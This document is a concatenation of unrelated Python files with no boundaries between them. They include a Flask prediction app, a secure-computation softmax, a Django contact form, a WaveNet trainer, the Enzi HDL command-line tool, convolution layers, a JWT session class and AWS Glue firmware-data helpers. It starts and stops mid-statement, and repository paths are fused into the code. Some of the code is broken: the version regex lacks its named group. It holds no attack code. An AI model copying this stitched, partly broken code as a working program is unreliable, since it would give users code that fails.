open('model.pkl', 'rb') as file: model = load(file) portEntry = request.form['portEntry'] visitType = request.form['visitType'] origin = request.form['origin'] month = request.form['month'] input = [[portEntry, visitType, origin, month]] predict = model.predict(input) return render_template('results.html', predictData = predict) if __name__ == "__main__": app.run() #!/usr/bin/env python # coding=utf-8 """ Ant Group Copyright (c) 2004-2020 All Rights Reserved. ------------------------------------------------------ File Name : softmax Author : Email: Create Time : 2020-12-01 14:17 Description : description what the main function of this file """ from stensorflow.basic.basic_class.pair import SharedPair import tensorflow as tf from stensorflow.exception.exception import StfTypeException from stensorflow.basic.operator.relu import relu from stensorflow.basic.operator.sigmoid import sin2pi import numpy as np from stensorflow.global_var import StfConfig from stensorflow.basic.basic_class.private import PrivateTensor from typing import Union def softmax_bak(x: Union[SharedPair, PrivateTensor]): if isinstance(x, SharedPair): y = relu(x) # + x.ones_like() z = y.reduce_sum(axis=1, keepdims=True) # return ~ (sin2pi(z, T=2**41)*(2**40/np.pi)) * y # return ~sin2pi(z, T=2 ** 14) * y / (2 ** 13 / np.pi) return y / z elif isinstance(x, PrivateTensor): with tf.device(x.owner): y = tf.nn.softmax(x.to_tf_tensor()) y = tf.cast(y * (2 ** x.fixedpoint), 'int64') z = PrivateTensor(owner=x.owner, fixedpoint=x.fixedpoint, inner_value=y, module=x.module, op_map=x.op_map) return z else: raise StfTypeException("x", "SharedPair or PrivateTensor", type(x)) def softmax(x: Union[SharedPair, PrivateTensor]): if isinstance(x, SharedPair): # x = x - x.reduce_sum(axis=-1, keepdims=True) # x = StfConfig.softmax_iter_num * sin2pi(x, T=StfConfig.softmax_iter_num*4) y = x.ones_like() / x.shape[-1] for _ in range(StfConfig.softmax_iter_num): # formula of # y = y + (x - (y * x).reduce_sum(axis=-1, keepdims=True)) * y / StfConfig.softmax_iter_num y = y + (x - (y.expend_dims(axis=[-2]) @ x.expend_dims(axis=-1)).squeeze(axis=-1)) * y / StfConfig.softmax_iter_num return y elif isinstance(x, PrivateTensor): with tf.device(x.owner): y = tf.nn.softmax(x.to_tf_tensor()) y = tf.cast(y * (2 ** x.fixedpoint), 'int64') z = PrivateTensor(owner=x.owner, fixedpoint=x.fixedpoint, inner_value=y, module=x.module, op_map=x.op_map) return z else: raise StfTypeException("x", "SharedPair or PrivateTensor", type(x)) from django.views.generic.edit import CreateView from django.contrib import messages from django.urls import reverse_lazy from django.utils.translation import gettext as _ from .forms import ContactForm from .models import ContactsList class ContactFormView(CreateView): template_name = "contact/contact.html" form_class = ContactForm success_url = reverse_lazy("index") def get_context_data(self, **kwargs): context = super(ContactFormView, self).get_context_data(**kwargs) context["contacts"] = ContactsList.objects.all() return context def form_valid(self, form): if form.send_email(): messages.success(self.request, _("Message sent")) else: messages.error(self.request, _("Message not sent, please try again later.")) return super().form_valid(form) ifding/dynamic-analysis-firmware """ Main model of WaveNet Calculate loss and optimizing """ import os import torch import torch.optim import torch.nn.functional as F from torch.autograd import Variable from warpctc_pytorch import CTCLoss from model.networks import WaveNet as WaveNetModule class WaveNet: def __init__(self, layer_size, stack_size, in_channels, res_channels, lr=0.002): self.net = WaveNetModule(layer_size, stack_size, in_channels, res_channels) self.in_channels = in_channels self.receptive_fields = self.net.receptive_fields self.lr = lr self.loss = self._loss() self.optimizer = self._optimizer() self.criterion = CTCLoss() self._prepare_for_gpu() @staticmethod def _loss(): loss = torch.nn.CrossEntropyLoss() if torch.cuda.is_available(): loss = loss.cuda() return loss def _optimizer(self): return torch.optim.Adam(self.net.parameters(), lr=self.lr) def _prepare_for_gpu(self): #if torch.cuda.device_count() > 1: # print("{0} GPUs are detected.".format(torch.cuda.device_count())) # self.net = torch.nn.DataParallel(self.net) if torch.cuda.is_available(): self.net.cuda() def train(self, inputs, targets, input_percentages, target_sizes): """ Train 1 time :param inputs: Tensor[batch, timestep, channels] :param targets: Torch tensor [batch, timestep, channels] :return: float loss """ inputs = Variable(inputs, requires_grad=False) target_sizes = Variable(target_sizes, requires_grad=False) targets = Variable(targets, requires_grad=False) if torch.cuda.is_available(): inputs = inputs.cuda() inputs = torch.squeeze(inputs) outputs = self.net(inputs) outputs = outputs.transpose(0, 1) # TxNxH seq_length = outputs.size(0) sizes = Variable(input_percentages.mul_(int(seq_length)).int(), requires_grad=False) loss = self.criterion(outputs, targets, sizes, target_sizes) loss = loss / inputs.size(0) # average the loss by minibatch loss_sum = loss.data.sum() inf = float("inf") if loss_sum == inf or loss_sum == -inf: print("WARNING: received an inf loss, setting loss value to 0") loss_value = 0 else: loss_value = loss.item() self.optimizer.zero_grad() loss.backward() self.optimizer.step() #if torch.cuda.is_available(): # torch.cuda.synchronize() return loss_value def _train(self, inputs, targets): """ Train 1 time :param inputs: Tensor[batch, timestep, channels] :param targets: Torch tensor [batch, timestep, channels] :return: float loss """ outputs = self.net(inputs) loss = self.loss(outputs.view(-1, self.in_channels), targets.long().view(-1)) self.optimizer.zero_grad() loss.backward() self.optimizer.step() return loss.data[0] def generate(self, inputs): """ Generate 1 time :param inputs: Tensor[batch, timestep, channels] :return: Tensor[batch, timestep, channels] """ if torch.cuda.is_available(): inputs = inputs.cuda() inputs = torch.squeeze(inputs) outputs = self.net(inputs) return outputs @staticmethod def get_model_path(model_dir, step=0): basename = 'wavenet' if step: return os.path.join(model_dir, '{0}_{1}.pkl'.format(basename, step)) else: return os.path.join(model_dir, '{0}.pkl'.format(basename)) def load(self, model_dir, step=0): """ Load pre-trained model :param model_dir: :param step: :return: """ print("Loading model from {0}".format(model_dir)) model_path = self.get_model_path(model_dir, step) self.net.load_state_dict(torch.load(model_path)) def save(self, model_dir, step=0): print("Saving model into {0}".format(model_dir)) model_path = self.get_model_path(model_dir, step) torch.save(self.net.state_dict(), model_path) ############################################### # Import Dependencies ############################################### from flask import Flask, render_template, redirect from flask_pymongo import PyMongo import scrape_mars ############################################### # Flask Setup ############################################### # create an app app = Flask(__name__) ############################################### # Database Setup ############################################### # Use flask_pymongo to set up mongo connection app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_db" mongo = PyMongo(app) ############################################### # Flask Routes ############################################### #define endpoints @app.route("/") def index(): mars_facts = mongo.db.mars_facts.find_one() return render_template("index.html", mars_facts=mars_facts) @app.route("/scrape") def scraper(): mars_facts = mongo.db.mars_facts scrape_mars_list = scrape_mars.scrape() mars_facts.update({}, scrape_mars_list, upsert=True) return redirect("/", code=302) ############################################### # Run the Flask Application ############################################### if __name__ == "__main__": app.run(debug=True)enzi/app.py # -*- coding: utf-8 -*- import argparse import datetime import io import logging import os import pprint import re import shutil import sys import toml import colorama from colorama import Fore, Style from enzi.validator import EnziConfigValidator, VersionValidator from enzi.config import validate_git_repo, RawConfig from enzi.git import Git from enzi.file_manager import IncDirsResolver from enzi.project_manager import ProjectFiles from enzi.utils import rmtree_onerror, OptionalAction, BASE_ESTRING from enzi.frontend import Enzi # **************** LOGGING CONFIGURATION **************** # try: import coloredlogs except Exception: coloredlogs = None # logging LOG_FMT = '%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s' logging.basicConfig(format=LOG_FMT) logger = logging.getLogger('Enzi') # HDL source code file SUFFIXES HDL_SUFFIXES = {'vhd', 'vhdl', 'v', 'vh', 'sv', 'svh', 'tcl', 'xdc', 'xci'} HDL_SUFFIXES_TUPLE = tuple(HDL_SUFFIXES) # auto commit message for enzi update --git -m AUTO_COMMIT_MESSAGE = 'Auto commit by Enzi' # REGEX for matching PKG_SECTION_RE = re.compile(r'\[\s*package\s*\]') VERISON_FIELD_RE = re.compile(r'^\s*version\s*=\s*"(?P(.*))"') class ProjectInitialor(object): """ Initialize a enzi project with a given package name. If the package name directory is already exists, its reject to create the package directory. """ def __init__(self, package_name, *, cwd=None): if cwd is None: cwd = os.getcwd() self.path = os.path.join(cwd, package_name) self.name = package_name self.git = Git(self.path) def init(self): self.init_package() self.init_git() def init_package(self): """Initialize the package directory, generate the Enzi.toml, and also create a src sub directory.""" # create the package directory if os.path.exists(self.path): msg = 'path "{}" already existed, init aborted'.format(self.path) logger.error(msg) raise SystemExit(BASE_ESTRING + msg) os.makedirs(self.path) # create the src sub directory os.makedirs(os.path.join(self.path, 'src')) # get git config user.name default_author = self.git.spawn_with( lambda x: x.arg('config').arg('user.name')).strip() # create the Enzi.toml enzi_toml = os.path.join(self.path, 'Enzi.toml') f = io.FileIO(enzi_toml, 'w') writer = io.BufferedWriter(f) sio = EnziConfigValidator.base_file(self.name, default_author) file_content = sio.getvalue() writer.write(file_content.encode('utf-8')) writer.close() def init_git(self): """Initialize the git repository in the package directory""" self.git.spawn_with(lambda x: x.arg('init')) self.git.add_files('Enzi.toml') # add .gitignore gitignore = os.path.join(self.path, '.gitignore') with open(gitignore, 'w') as f: f.write('# ignore Enzi build directory\n') f.write('build/\n') self.git.add_files('.gitignore') class EnziApp(object): """ Enzi Cli Application """ __tasks__ = {'clean', 'update'} __targets__ = {'build', 'sim', 'run', 'program_device'} def __init__(self): (self.args, self.parser) = EnziApp.parse_args() self.enzi = None self.init() def update_args(self, args): """update the args that use in running this app""" self.args = self.parser.parse_args(args) def init(self): """initialize this app""" self.init_logger() def run(self): """run this app""" # if user want to run enzi config help if self.args.enzi_config_help: self.enzi_config_help() return # tasks args = self.args if args.enzi_config_help: self.enzi_config_help() return is_task = hasattr(args, 'task') # check if this run is task # clean up enzi workspace if is_task and args.task == 'clean': self.clean() return if is_task and args.task == 'init': self.init_package() return if is_task and args.task == 'check': self.check_package() return # a root must be specified if not running {'clean', 'init', 'check'} if not args.root: raise RuntimeError('No root directory specified.') # if update, root must be specified if args.config: if os.path.dirname(args.config): fmt = 'flag config {} should only be a filename, not a path of the file' msg = fmt.format(args.config) self.error(msg) raise SystemExit(1) self.enzi = Enzi( args.root[0], args.config, non_lazy=self.args.non_lazy) else: self.enzi = Enzi(args.root[0], non_lazy=self.args.non_lazy) if is_task and args.task == 'update': if args.version: # --version self.update_version() elif args.git: # -- git self.update_git() else: # enzi update without flags self.update_deps() return # targets self.run_target() def run_target(self, **kwargs): """ run Enzi target """ enzi = kwargs.get('enzi', self.enzi) target = self.args.target if target is None: return self.info('start `{}`'.format(target)) # init the enzi frontend enzi.init() enzi.silence_mode = self.args.silence_mode # if we set --gui flag for this target use_gui = hasattr(self.args, 'gui') and self.args.gui enzi.gui_mode = use_gui # get target filesets project_manager = ProjectFiles(enzi) project_manager.fetch(target) fileset = project_manager.get_fileset(target) # run target enzi.run_target(target, fileset, self.args.tool) self.info('`{}` done'.format(target)) def init_logger(self): """ get properly log warnning and log error function """ if self.args.log_level: log_level = getattr(logging, self.args.log_level) if coloredlogs: coloredlogs.install(level=log_level, fmt=LOG_FMT) else: logging.basicConfig(level=log_level) ch = logging.StreamHandler() formatter = logging.Formatter(LOG_FMT) ch.setFormatter(formatter) elif coloredlogs: coloredlogs.install(level='INFO', fmt=LOG_FMT) if coloredlogs: effective_level = coloredlogs.get_level() else: effective_level = logger.getEffectiveLevel() # make sure warning and error display at any effective level if effective_level > logging.WARNING: self.warning = logger.critical else: self.warning = logger.warning if effective_level > logging.ERROR: self.error = logger.critical else: self.error = logger.error self.info = logger.info self.debug = logger.debug self.exception = logger.exception self.critical = logger.critical def init_package(self): """Initialize an Enzi Package/Project""" package_name = self.args.name if package_name is None: msg = 'an package name must provide for enzi init' logging.error(msg) raise SystemExit(BASE_ESTRING + msg) initializer = ProjectInitialor(package_name) initializer.init() def check_package(self): manifest_only = self.args.manifest root = self.args.root config_name = self.args.config config_name = config_name if config_name else 'Enzi.toml' if os.path.dirname(config_name): fmt = 'flag config {} should only be a filename, not a path of the file' self.error(fmt.format(config_name)) raise SystemExit() config_path = os.path.join(root, config_name) # check the Enzi.toml try: config = RawConfig(config_path).validate() except Exception: self.error('{} is invalid'.format(config_path)) raise SystemExit(1) if manifest_only: return # check filesets try: config.check_filesets() except Exception: raise SystemExit(1) # check unlisted(in filesets section) files in this package is_git_repo = validate_git_repo('', root, True) if is_git_repo: git = Git(root) untracked = git.list_untracked() ufilter = filter(lambda x: x.endswith( HDL_SUFFIXES_TUPLE), untracked) untracked_hdl = list(ufilter) if untracked_hdl: fmt = 'this package has some hdl files: {}, which are not listed in {}\'s filesets' msg = fmt.format(untracked_hdl, config_path) self.warning(msg) else: # if the package is not a git repository # we walk the directory to check filesets' files validation. cwd = os.getcwd() os.chdir(root) fileset = config.get_flat_fileset() fileset = set(fileset['files']) flist = [] def files_filter(x): return x.endswith(HDL_SUFFIXES_TUPLE) # TODO: code review for (dirpath, _, filenames) in os.walk(root): dirname = os.path.relpath(dirpath, root) if not dirname == '.' and dirname.startswith('.'): continue base_dirname = os.path.basename(dirname) if not base_dirname == '.' and base_dirname.startswith('.'): continue if base_dirname == '.': files = map(lambda x: x, filenames) ffiles = filter(files_filter, files) ffiles = list(ffiles) flist.extend(ffiles) else: files = map(lambda x: os.path.join(dirname, x), filenames) ffiles = filter(files_filter, files) ffiles = list(ffiles) flist.extend(ffiles) cur_fset = set(flist) unlisted = cur_fset - fileset if unlisted: fmt = 'this package has some hdl files: {}, which are not listed in {}\'s filesets' msg = fmt.format(unlisted, config_path) self.warning(msg) os.chdir(cwd) # check include files directories if not self.args.include: return files = config.get_flat_fileset()['files'] resolver = IncDirsResolver(root, files) resolver.check_include_files(root, clogger=self) def enzi_config_help(self): config_name = self.args.enzi_config_help if config_name is sys.stdout or isinstance(config_name, io.TextIOWrapper): self.info('Here is the template Enzi.toml file\'s key-values hints:') sio = EnziConfigValidator.info() print(sio.getvalue()) sio.close() elif isinstance(config_name, (str, bytes)): sio = EnziConfigValidator.info() info = sio.getvalue().encode('utf-8') sio.close() outfile_dir = os.path.dirname(config_name) # Make sure the output file directory exists. # Enzi will not create the directory if it doesn't exist. if outfile_dir and not os.path.exists(outfile_dir): outname = os.path.basename(config_name) fmt = 'path \'{}\' for \'{}\' does not exist' msg = fmt.format(outfile_dir, outname) self.error(msg) sys.exit(1) if os.path.exists(config_name): msg = '{} is already exists'.format(config_name) self.error(msg) sys.exit(1) outfile = io.FileIO(config_name, 'w') owriter = io.BufferedWriter(outfile) owriter.write(info) owriter.close() msg = 'Generated the template Enzi.toml file\'s key-values hints in ' + config_name self.info(msg) def update_package_version(self, version, *, validated=False): """update the package version of the Enzi.toml in the given root""" if type(version) != str: raise ValueError('Version must be a string') if not validated: raw_version = version.strip() if raw_version.startswith('v'): raw_version = raw_version.strip()[1:] version = VersionValidator( key='version', val=raw_version).validate() root = self.args.root config = self.args.config config = config if config else 'Enzi.toml' config_path = os.path.join(root, config) with open(config_path, 'r') as f: data = f.read() lines = data.splitlines() nlines = len(lines) # find the package section idx = -1 for i, line in enumerate(lines): if PKG_SECTION_RE.search(line): idx = i break if idx == -1: self.error('No package section found') raise SystemExit(1) for i in range(idx, nlines): v_search = VERISON_FIELD_RE.search(lines[i]) if v_search: found_version = v_search.groupdict()['version'] if version in found_version: return new_version_line = lines[i].replace(found_version, version) lines[i] = new_version_line break # lines to write back # print(lines) mlines = map(lambda x: x + '\n', lines) with open(config_path, 'w') as f: f.writelines(mlines) self.debug('EnziApp: update_package_version done.') def update_version(self): """enzi update --version""" root = self.args.root self.info('updating the version of this Enzi package') raw_version = self.args.version.strip() if raw_version.startswith('v'): raw_version = raw_version.strip()[1:] version = VersionValidator(key='version', val=raw_version).validate() git = Git(root) tags = git.list_tags() exists = False if tags: exists = any(filter(lambda x: version in x, tags)) version = 'v' + version if exists: msg = 'Version tag {} already exists'.format(version) self.error(msg) raise SystemExit(BASE_ESTRING + msg) vtag = version if git.has_changed(): self.debug('This package has changed. Update its git repo.') git = self.update_git() if git is None: raise SystemExit(1) self.args.message = version self.update_package_version(version[1:], validated=True) git = self.update_git() git.quiet_spawn_with( lambda x: x.arg('tag').arg(vtag) ) self.info('update to version {} finished'.format(vtag)) def update_git(self): """update the package's git repository""" root = self.args.root name = self.enzi.name self.info('updating this Enzi package\'s git repository') try: validate_git_repo(name, root) except Exception as e: msg = str(e) raise SystemExit(BASE_ESTRING + msg) git = Git(root) # untracked and modified files untracked = git.list_untracked() modified = git.list_modified() cached = git.list_cached() if 'Enzi.toml' not in cached: git.add_files('Enzi.toml') try: self.enzi.check_filesets() except Exception: raise SystemExit(1) from None fileset = self.enzi.get_flat_fileset() if fileset: _files = fileset['files'] git.add_files(_files) # DEBUG msg p = pprint.pformat(untracked) logger.debug('untracked files: ' + p) p = pprint.pformat(modified) logger.debug('modified files: ' + p) # filter out HDL files in untracked files ufilter = filter(lambda x: x.endswith(HDL_SUFFIXES_TUPLE), untracked) ufiltered = list(ufilter) if ufiltered: msg = 'This Package({}) contains untracked HDL files!'.format(name) self.warning(msg) ufiles = '\n'.join(ufiltered) msg = 'Here is the untracked HDL files:\n{}'.format(ufiles) self.warning(msg) msg = 'Do you want to update this package\'s git repository without these HDL files?' self.warning(msg) confirm = self.get_confirm() if confirm is None: return None if not confirm: msg = 'You must manually update the Enzi.toml\'s filesets section with the expected HDL files.' logger.error(msg) raise SystemExit(BASE_ESTRING + msg) # staged modified files # print(modified) git.add_files(modified) # log commit message message = self.args.message if message is None: message = AUTO_COMMIT_MESSAGE fmt = 'update this package\'s git repository with commit message:{} "{}"' msg = fmt.format(Fore.BLUE, message) logger.info(msg) git.quiet_spawn_with( lambda x: x.arg('commit') .arg('-m') .arg(message) ) self.info('update git finished') return git def update_deps(self, **kwargs): """ the default behaviour of enzi update """ enzi = kwargs.get('enzi', self.enzi) if not isinstance(enzi, Enzi): return self.info('start updating') enzi.init(update=True) self.info('updating finished') def clean(self, **kwargs): """ Enzi clean task, enzi [--root ROOT] [--config CONFIG] [--silence-mode] clean [--yes] """ yes = kwargs.get('yes', self.args.yes) root = kwargs.get('root', self.args.root) config_name = kwargs.get('config', self.args.config) if yes: confirm = yes else: if root: fmt = 'clean will clean up the build directory in \'{}\'' msg = fmt.format(root) self.warning(msg) else: self.warning('clean will clean up the build directory') confirm = self.get_confirm() if confirm != True: return root = root if root else '.' config_name = config_name if config_name else 'Enzi.toml' config_root = os.path.join(root, config_name) valid_root = os.path.exists(config_root) if not valid_root: msg = 'No {} in root directory \'{}\''.format(config_name, root) self.warning(msg) logger.info("Nothing to do.") return if confirm and os.path.exists('build'): shutil.rmtree('build', onerror=rmtree_onerror) if confirm and os.path.exists('Enzi.lock'): os.remove('Enzi.lock') logger.info(Fore.BLUE + 'finished cleaning') def get_confirm(self): """get confirmation from user""" self.warning('Would you like to execute[y/N]: ') _choice = input() choice = _choice.lower() if _choice else 'n' err_msg = "must input yes(y)/no(n), not " + _choice if not choice.startswith(('y', 'n')): self.error(err_msg) return if choice == 'y' or choice == 'yes': confirm = True elif choice == 'n' or choice == 'no': self.info("Nothing to do.") confirm = False else: self.error(err_msg) confirm = None return confirm @staticmethod def parse_args(input_args=None): supported_targets = ['build', 'sim', 'run', 'program_device'] available_tasks = ['clean', 'update', 'init', 'check'] parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() parser.add_argument("-l", "--log", dest="log_level", help='Set Enzi self log level', choices=[ 'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']) # Global options parser.add_argument( '--root', help='Enzi project root directory, default is current directory', default='.') parser.add_argument('--silence-mode', '-s', help='Only capture stderr', action='store_true') parser.add_argument( '--config', help='Specify the Enzi.toml file to use') parser.add_argument( '--non-lazy', help='Force Enzi to (re)generated corresponding backend configuration when running target', action='store_true') parser.add_argument('--enzi-config-help', help='Output an Enzi.toml file\'s key-values hints. \ If no output file is specified, Enzi will print to stdout.', action=OptionalAction, default=sys.stdout) # clean up args. clean_parser = subparsers.add_parser( 'clean', help='Clean all Enzi generated files') clean_parser.add_argument( '-y', '--yes', help='Skip clean up confirmation', action='store_true') clean_parser.set_defaults(task='clean') # update dependencies update_parser = subparsers.add_parser( 'update', help='Update dependencies') # whether to update current Enzi's git commit update_parser.add_argument( '--git', help='Update the current Enzi package\'s git commits, if it is a git repo.', action='store_true') # version bump for current Enzi project # if it is a git repo, Enzi will auto change package version in Enzi.toml. # Then Enzi will commit and tag with the given version update_parser.add_argument( '--version', '-v', help='''Bump version for the current Enzi project. If it is a git repo, Enzi will auto change package version in Enzi.toml and then commit and tag with the given version. If not, Enzi just update the package version in Enzi.toml. ''' ) update_parser.add_argument( '--message', '-m', help='Commit message for update git repository, if no message is specified, the message will be: "auto commit by Enzi"', action=OptionalAction, default=AUTO_COMMIT_MESSAGE) update_parser.set_defaults(task='update') # init task init_parser = subparsers.add_parser( 'init', help='Initialize an Enzi package with a given package name') init_parser.add_argument( 'name', help='the package name to initialize', action=OptionalAction) init_parser.set_defaults(task='init') # check task check_parser = subparsers.add_parser( 'check', help='Check validation of the package in the given path' ) check_parser.add_argument( '--manifest', help='Check Enzi.toml only', action='store_true' ) check_parser.add_argument( '--include', help='''Check Verilog the correctness and existence for all include files of the Verilog/SystemVerilog files delcared at Enzi.toml filesets sections. ''', action='store_true' ) check_parser.set_defaults(task='check') # build subparser build_parser = subparsers.add_parser( 'build', help='Build the given project') build_parser.add_argument('--tool', help='Override the default target') build_parser.add_argument( '--gui', help='Build in GUI mode, if this tool has a GUI.', action='store_true') build_parser.set_defaults(target='build') # run subparser run_parser = subparsers.add_parser('run', help='Run the given project') run_parser.add_argument('--tool', help='Override the default tool') run_parser.add_argument( '--gui', help='Run in GUI mode, if this tool has a GUI.', action='store_true') run_parser.set_defaults(target='run') # sim subparser sim_parser = subparsers.add_parser( 'sim', help='Simulate the given project') sim_parser.add_argument('--tool', help='Override the default tool') sim_parser.add_argument( '--gui', help='Simulate in GUI mode, if this tool has a GUI.', action='store_true') sim_parser.set_defaults(target='sim') # program_device subparser pd_parser = subparsers.add_parser( 'program_device', help='Program the given project to device(unimplemented yet)') pd_parser.add_argument('--tool', help='Override the default tool') pd_parser.set_defaults(target='program_device') if input_args: args = parser.parse_args(input_args) else: args = parser.parse_args() if not args.enzi_config_help is None: return (args, parser) if hasattr(args, 'target') or hasattr(args, 'task'): return (args, parser) else: logger.error('Target or Task must be specified') logger.error('Supported targets: {}'.format(supported_targets)) logger.error('Available tasks: {}'.format(available_tasks)) sys.exit(1) import torch import torch.nn as nn import torch.nn.functional as F class RandomFixedConv2d(nn.Module): """ A fixed random convolution. Wrapper for a more convenient use. Basically create a new convolution, initialize it and set `requires_grad_(False)` flag. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, groups=1, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedConv2d, self).__init__() self.conv = nn.Conv2d( in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode) self.requires_grad_(False) def forward(self, x): return self.conv(x) class RandomFixedConvTrans2d(nn.Module): """ A tranposed fixed random convolution. Wrapper for a more convenient use. Basically create a new convolution, initialize it and set `requires_grad_(False)` flag. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedConvTrans2d, self).__init__() self.conv = nn.ConvTranspose2d( in_channels, out_channels, kernel_size, stride, padding, output_padding, groups, bias, dilation, padding_mode) self.requires_grad_(False) def forward(self, x): return self.conv(x) class RandomFixedSeparableConv2d(nn.Module): """ Depthwise convolution with fixed random kernels followed by a trainable 1x1 convolution. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedSeparableConv2d, self).__init__() self.fixed_conv = RandomFixedConv2d( in_channels, in_channels, kernel_size, stride, padding, groups=in_channels, dilation=dilation, bias=bias, padding_mode=padding_mode) self.conv1x1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=bias) def forward(self, x): x = self.fixed_conv(x) x = self.conv1x1(x) return x class RandomFixedSeparableConvTrans2d(nn.Module): """ Transposed depthwise convolution with fixed random kernels preceeded by a trainable 1x1 convolution. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, dilation=1, bias=True, padding_mode='zeros'): super(RandomFixedSeparableConvTrans2d, self).__init__() self.conv1x1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=bias) self.fixed_conv = RandomFixedConvTrans2d( out_channels, out_channels, kernel_size, stride, padding, output_padding, groups=out_channels, dilation=dilation, bias=bias, padding_mode=padding_mode) def forward(self, x): x = self.conv1x1(x) x = self.fixed_conv(x) return x # -*- coding: UTF-8 -*- """ 用户会话相关API. """ import time import jwt from model.user import User from util import misc from const import JWT class UserSession: """ 用户会话 """ user = None expired_at = 0 # 新建一个用户会话 def __init__(self, token=None, phone=None): if token: self.__init_by_token(token) elif phone: self.__init_by_phone(phone) if not self.user or not self.user.exist(): self.user = None # 当前会话是否可用 def is_login(self): return bool(self.user) \ and not self.__is_expired() # 获取会话token def get_token(self): """ 返回token """ if not self.is_login(): return None return jwt.encode({ 'uid': self.user.uid, 'expired_at': self.expired_at, }, key=JWT.key, algorithm=JWT.algorithm) # 会话是否过期 def __is_expired(self): return time.time() >= self.expired_at def __init_by_phone(self, phone): self.expired_at = int(time.time()) + JWT.TTL phone = misc.encrypt_phone(phone) self.user = User(phone=phone) if not self.user.exist(): # 如果手机号不存在,则注册一个 self.user.create() def __init_by_token(self, token): try: jwt_data = jwt.decode(token, JWT.key, algorithms=[JWT.algorithm]) except jwt.exceptions.InvalidSignatureError: return if 'uid' not in jwt_data or 'expired_at' not in jwt_data: return self.user = User(uid=jwt_data['uid']) self.expired_at = int(jwt_data['expired_at']) src/finitestate/firmware/fsglue/glue.py0 import base64 import hashlib import json import logging import os import time from typing import Iterable from botocore.exceptions import ClientError from pyspark.sql import DataFrame, SparkSession from pyspark.sql.types import Row, StructType from pyspark.sql.utils import AnalysisException from finitestate.firmware.bloomfilter import get_bloom_filter_key from finitestate.firmware.schemas.schema_file_tree import file_tree_schema from finitestate.common.aws.s3 import s3_client, get_bucket_and_key_from_uri from finitestate.common.aws.catalogutils import using_boto3 as get_data_catalog from finitestate.common.aws.glue import ExecutorGlobals logger = logging.getLogger(__name__) def load_dataframe_from_glue_table(database: str, table_name: str, glue_context) -> DataFrame: return glue_context.spark_session.table('{}.{}'.format(database, table_name)) def downselect_dataframe(dataframe: DataFrame, list_of_columns_to_select) -> DataFrame: return dataframe.select(*list_of_columns_to_select) def publish_jsonl_to_s3(key, row, target_bucket, max_retries=5, validate_payload_checksum=False): """ Publishes individual rows to S3 as minified JSON. This assumes that the entire 'row' element is written as a single JSON object to the target file. 'data_type' is the plugin-name or otherwise descriptor of the data that is to be written. Additionally, 'row' must have a 'firmware_hash' field. """ payload = json.dumps(row.asDict(recursive=True) if isinstance(row, Row) else row, separators=(',', ':')) output = {'Bucket': target_bucket, 'Key': key} other_kwargs = {} if validate_payload_checksum: md5 = base64.b64encode(hashlib.md5(payload.encode()).digest()).decode() output['ContentMD5'] = md5 other_kwargs['ContentMD5'] = md5 retry = 0 while retry < max_retries: try: response = ExecutorGlobals.s3_client().put_object(Bucket=target_bucket, Key=key, Body=payload, **other_kwargs) output['ETag'] = response['ETag'] output['Attempts'] = retry + 1 return output except ClientError: retry += 1 time.sleep(2**retry) output['Attempts'] = retry + 1 return output def publish_custom_cloudwatch_glue_metric(cloudwatch_client, job_name, job_run_ids, metric_name, value, unit=None, namespace=None): for job_run_id in job_run_ids: response = cloudwatch_client.put_metric_data( MetricData=[ { 'MetricName': metric_name, 'Dimensions': [{ 'Name': 'JobName', 'Value': job_name }, { 'Name': 'JobRunId', 'Value': job_run_id }], 'Unit': unit or 'None', 'Value': value }, ], Namespace=namespace or 'Glue', ) if not response or 200 != response.get('ResponseMetadata', {}).get('HTTPStatusCode'): raise Exception('Failed to publish metric: {}'.format(response)) def publish_df_as_jsonl(df, get_key_for_row, target_bucket, row_formatter=None): # yapf: disable try: return df.rdd.map( lambda row: publish_jsonl_to_s3(get_key_for_row(row), row_formatter(row) if row_formatter else row, target_bucket, validate_payload_checksum=True) ).filter( lambda output: output.get('ETag') # was written to S3 ).count() except Exception as e: print('Failed to write row as jsonl: {}'.format(e)) return 0 # yapf: enable def read_firmware_file_tree(glue_database: str, fw_sha256: str) -> DataFrame: """ Reads a firmware file tree from the jsonl files backing the file_tree table defined in the Glue Data Catalog. :param glue_database: The name of the Glue database from which to read the files, e.g. fimrware_prod. :param fw_sha256: The SHA 256 of the firmware to read. """ file_tree_path = get_data_catalog().get_table_path(glue_database, 'file_tree') return SparkSession.builder.getOrCreate().read.json(os.path.join(file_tree_path, f'{fw_sha256}.jsonl'), schema=file_tree_schema) def read_firmware_level_data(glue_database: str, table_name: str, fw_sha256: str, schema: StructType, extension: str = 'jsonl') -> DataFrame: """ Reads a json/jsonl dataset from a single file identified by a firmware sha256, with the path determined by the table projecting that data in the Glue Data Catalog. Args: glue_database: The name of the Glue database from which to read the file, e.g. firmware_prod table_name: The name of the table to read fw_sha256: The SHA 256 of the firmware to read schema: The PySpark schema for the returned data extension: The file extension of the file, typically jsonl which is the default. Returns: A PySpark DataFrame of the data from object storage, or an empty DataFrame with the appropriate schema """ path = get_data_catalog().get_table_path(glue_database, table_name) spark = SparkSession.builder.getOrCreate() try: return spark.read.json(os.path.join(path, f'{fw_sha256}.{extension}'), schema=schema) except AnalysisException as e: logger.exception(f'Failed to read firmware {fw_sha256} data from {path} - returning empty DataFrame') return spark.createDataFrame(spark.sparkContext.emptyRDD(), schema) def read_sbom(glue_database: str, fw_sha256: str) -> DataFrame: """ Reads an SBoM from the json files backing the sbom table defined in the Glue Data Catalog. :param glue_database: The name of the Glue database from which to read the files, e.g. fimrware_prod. :param fw_sha256: The SHA 256 of the firmware whose SBoM should be read. """ from finitestate.firmware.schemas.schema_sbom import sbom_schema sbom_path = get_data_catalog().get_table_path(glue_database, 'sbom') return 